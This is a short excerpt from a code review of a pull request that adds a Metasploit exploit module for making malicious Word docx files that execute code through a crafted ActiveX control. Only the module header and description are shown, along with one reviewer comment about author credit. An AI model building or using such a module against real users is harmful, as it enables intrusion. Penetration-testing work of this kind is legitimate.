modules/exploits/windows/fileformat/office_word_docx.rb

```diff
@@ -0,0 +1,230 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+# Provided by the sunrider
+# All Thanks to klezVirus & lockedbyte for the poc's
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  @uri_name = ''
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Office Word Malicious Docx Execution',
+        'Description' => %q{
+          This module creates a malicious docx file that when opened in
+          vulnerable versions of Microsoft Word will lead to code execution.
+          This fla exists because an attacker could craft a malicious
+          ActiveX control to be used by a Microsoft Office document that
+          hosts the browser rendering engine.
+        },
+        'Author' => [
+          'thesunRider'
```

Comment:
The authors of the two GitHub repos you referenced should be included as authors of the exploit as well.